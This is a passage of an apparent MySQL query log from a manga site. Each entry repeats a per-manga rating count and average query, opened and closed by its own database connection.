where manga_id = '92' order by created desc 330657482 Quit 330657483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330657483 Quit 330657484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330657484 Quit 330657485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330657485 Quit 330657486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330657486 Quit 330657487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330657487 Quit 330657488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330657488 Quit 330657489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330657489 Quit 330657490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330657490 Quit 330657491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330657491 Quit 330657492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330657492 Quit 330657493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330657493 Quit 330657494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330657494 Quit 330657495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330657495 Quit 330657496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330657496 Quit 330657497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330657497 Quit 330657498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330657498 Quit 330657499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330657499 Quit 330657500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330657500 Quit 330657501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330657501 Quit 330657502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330657502 Quit 330657503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330657503 Quit 330657504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330657504 Quit 330657505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330657505 Quit 330657506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330657506 Quit 330657507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330657507 Quit 330657508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330657508 Quit 330657509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330657509 Quit 330657510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330657510 Quit 330657511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330657511 Quit 330657512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330657512 Quit 330657513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330657513 Quit 330657514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330657514 Quit 330657515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330657515 Quit 330657516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330657516 Quit 330657517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330657517 Quit 330657518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330657518 Quit 330657519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330657519 Quit 330657520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330657520 Quit 330657521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330657521 Quit 330657522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330657522 Quit 330657523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330657523 Quit 330657524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330657524 Quit 330657525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330657525 Quit 330657526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330657526 Quit 330657527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330657527 Quit 330657528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330657528 Quit 330657529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330657529 Quit 330657530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330657530 Quit 330657531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330657531 Quit 330657532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330657532 Quit 330657533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330657533 Quit 330657534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330657534 Quit 330657535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330657535 Quit 330657536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330657536 Quit 330657537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330657537 Quit 330657538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330657538 Quit 330657539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330657539 Quit 330657540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330657540 Quit 330657541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330657541 Quit 330657542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330657542 Quit 330657543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330657543 Quit 330657544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330657544 Quit 330657545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330657545 Quit 330657546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330657546 Quit 330657547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330657547 Quit 330657548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330657548 Quit 330657549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330657549 Quit 330657550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330657550 Quit 330657551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330657551 Quit 330657552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330657552 Quit 330657553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330657553 Quit 330657554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330657554 Quit 330657555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330657555 Quit 330657556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330657556 Quit 330657557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330657557 Quit 330657558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330657558 Quit 330657559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330657559 Quit 330657560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330657560 Quit 330657561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330657561 Quit 330657562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330657562 Quit 330657563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330657563 Quit 330657564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330657564 Quit 330657565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330657565 Quit 330657566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330657566 Quit 330657567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330657567 Quit 330657568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330657568 Quit 330657569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330657569 Quit 330657570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330657570 Quit 330657571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330657571 Quit 330657572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330657572 Quit 330657573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330657573 Quit 330657574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330657574 Quit 330657575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330657575 Quit 330657576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330657576 Quit 330657577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330657577 Quit 330657578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330657578 Quit 330657579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330657579 Quit 330657580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330657580 Quit 330657581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330657581 Quit 330657582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330657582 Quit 330657583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330657583 Quit 330657584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330657584 Quit 330657585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330657585 Quit 330657586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330657586 Quit 330657587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330657587 Quit 330657588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330657588 Quit 330657589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330657589 Quit 330657590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330657590 Quit 330657591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330657591 Quit 330657592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330657592 Quit 330657593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330657593 Quit 330657594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330657594 Quit 330657595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330657595 Quit 330657596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330657596 Quit 330657597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330657597 Quit 330657598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330657598 Quit 330657599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330657599 Quit 330657600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330657600 Quit 330657601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330657601 Quit 330657602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330657602 Quit 330657603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330657603 Quit 330657604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330657604 Quit 330657605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330657605 Quit 330657606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330657606 Quit 330657607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330657607 Quit 330657608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330657608 Quit 330657609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330657609 Quit 330657610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330657610 Quit 330657611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330657611 Quit 330657612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330657612 Quit 330657613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330657613 Quit 330657614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330657614 Quit 330657615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330657615 Quit 330657616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330657616 Quit 330657617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330657617 Quit 330657618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330657618 Quit 330657619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330657619 Quit 330657620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330657620 Quit 330657621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330657621 Quit 330657622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330657622 Quit 330657623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330657623 Quit 330657624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330657624 Quit 330657625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330657625 Quit 330657626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330657626 Quit 330657627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330657627 Quit 330657628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330657628 Quit 330657629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330657629 Quit 330657630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330657630 Quit 330657631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330657631 Quit 330657632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330657632 Quit 330657633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330657633 Quit 330657634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330657634 Quit 330657635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id 